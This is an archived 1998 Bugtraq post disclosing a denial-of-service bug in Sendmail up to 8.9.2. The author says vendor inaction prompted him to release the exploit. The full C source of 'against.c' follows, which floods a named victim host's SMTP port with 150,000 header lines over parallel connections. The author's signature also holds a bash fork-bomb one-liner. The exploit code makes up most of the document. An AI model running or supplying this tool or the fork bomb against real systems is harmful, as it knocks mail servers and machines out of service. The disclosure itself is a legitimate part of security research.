[ http://www.rootshell.com/ ]
Date: Sat, 12 Dec 1998 19:39:56 +0100
From: Michal Zalewski <lcamtuf@IDS.PL>
To: BUGTRAQ@netspace.org
Subject: ** Sendmail 8.9.2 DoS - exploit ** get what you want!
Hello again. Yesterday, I published some rather laconic information about
two bugs in Sendmail up to 8.9.2, and decided to post only short description
of problem + suggested patch (instead of exploit), to give developers a
chance. Unfortunately, I put together information about two completely
different problems in single posting, and it confuded a lot of people. So,
to kill any senseless discussions - again:
- The first one was 'redirection attack'; I said you could call it 'bug'
instead of 'feature', but as noone likes anonymous mailbombing,
network overloading / scanning, it's good to apply sendmail.cf patch
included in original posting; without it, your relay could be abused in
many painful ways. And yes, attack has been confirmed with 8.9.2 and
sendmail.cf from 8.9.2 with relaying enabled. I don't think there's
anything left to talk about. Dot.
- The second one was DoS attack during headers parsing - and this is
a bug, *confirmed on 8.9.2*. I included simple patch to source tree.
Unfortunately, all feedback we received from developers was one-line
response 'It has been fixed in 8.9.2'. Bullshit (sorry). I decided
not to publish an exploit, but now I realized there's no chance for
response from vendors if there's no real danger. So here it is.
Attached file, against.c, should perform very 'light' attack, only
for testing purposes. If you noticed increased LA during attack,
your machine is vunerable. You had enough time to patch your system
- don't blame me, but vendors. EOF.
_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM]
[http://linux.lepszy.od.kobiety.pl/~lcamtuf/] <=--=> bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
-------------------------------------------------------------------------
/*
against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2)
(c) 1999 by <marchew@linux.lepszy.od.kobiety.pl>
Usage: ./against existing_user_on_victim_host victim_host
Example: ./against nobody lamers.net
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <errno.h>
#include <signal.h>
#include <getopt.h>
#include <stdlib.h>
#include <string.h>
#define MAXCONN 5
#define LINES 150000
struct hostent *hp;
struct sockaddr_in s;
int suck,loop,x;
int main(int argc,char* argv[]) {
printf("against.c - another Sendmail DoS (up to 8.9.2)\n");
if (argc-3) {
printf("Usage: %s victim_user victim_host\n",argv[0]);
exit(0);
}
hp=gethostbyname(argv[2]);
if (!hp) {
perror("gethostbyname");
exit(1);
}
fprintf(stderr,"Doing mess: ");
for (;loop<MAXCONN;loop++) if (!(x=fork())) {
FILE* d;
bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length);
s.sin_family=hp->h_addrtype;
s.sin_port=htons(25);
if ((suck=socket(AF_INET,SOCK_STREAM,0))<0) perror("socket");
if (connect(suck,(struct sockaddr *)&s,sizeof(s))) perror("connect");
if (!(d=fdopen(suck,"w"))) { perror("fdopen"); exit(0); }
usleep(100000);
fprintf(d,"helo tweety\n");
fprintf(d,"mail from: tweety@polbox.com\n");
fprintf(d,"rcpt to: %s@%s\n",argv[1],argv[2]);
fprintf(d,"data\n");
usleep(100000);
for(loop=0;loop<LINES;loop++) {
if (!(loop%100)) fprintf(stderr,".");
fprintf(d,"To: x\n");
}
fprintf(d,"\n\n\nsomedata\n\n\n");
fprintf(d,".\n");
sleep(1);
fprintf(d,"quit\n");
fflush(d);
sleep(100);
shutdown(suck,2);
close(suck);
exit(0);
}
waitpid(x,&loop,0);
fprintf(stderr,"ok\n");
return 0;
}
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
